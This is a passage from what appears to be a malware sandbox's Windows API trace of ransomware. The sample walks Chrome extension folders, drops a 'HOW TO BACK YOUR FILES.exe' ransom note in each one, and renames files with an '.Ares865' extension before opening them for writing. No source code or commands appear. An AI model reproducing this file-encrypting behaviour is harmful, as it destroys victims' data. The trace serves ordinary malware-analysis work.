data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.581] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.581] GetLastError () returned 0x0 [0103.581] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.581] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85cca3f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f04ff80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f04ff80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.581] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.581] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.581] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0" [0103.582] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0" [0103.582] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.582] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.582] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.583] GetLastError () returned 0x0 [0103.583] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.583] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f0760e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f0760e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.583] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.583] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.583] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png.Ares865") returned 147 [0103.583] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png.ares865"), dwFlags=0x1) returned 1 [0103.585] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.585] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3372) returned 1 [0103.605] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png.Ares865") returned 146 [0103.605] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png.ares865"), dwFlags=0x1) returned 1 [0103.607] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.607] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=160) returned 1 [0103.611] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html.Ares865") returned 144 [0103.611] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html.ares865"), dwFlags=0x1) returned 1 [0103.612] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.613] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=92) returned 1 [0103.621] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js.Ares865") returned 142 [0103.621] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js.ares865"), dwFlags=0x1) returned 1 [0103.642] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.642] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=95) returned 1 [0103.645] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json.Ares865") returned 148 [0103.645] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json.ares865"), dwFlags=0x1) returned 1 [0103.647] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.647] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=725) returned 1 [0103.650] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata" [0103.651] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata" [0103.651] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.651] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.651] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.652] GetLastError () returned 0x0 [0103.652] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.652] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b998f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f0760e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f0760e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.652] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.652] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.652] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json.Ares865") returned 165 [0103.652] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json.ares865"), dwFlags=0x1) returned 1 [0103.654] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.654] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=352) returned 1 [0103.657] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json.Ares865") returned 167 [0103.657] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json.ares865"), dwFlags=0x1) returned 1 [0103.658] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.659] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11094) returned 1 [0103.662] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0103.662] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0103.662] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.662] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.663] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.663] GetLastError () returned 0x0 [0103.663] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.663] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f09c240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f09c240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.663] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.663] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.664] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW" [0103.664] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW" [0103.664] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.664] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_tw\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.664] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.665] GetLastError () returned 0x0 [0103.665] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.665] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b4d630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f0c23a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f0c23a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.665] lstrcmpiW (lpString1=".", lpString2="HOW 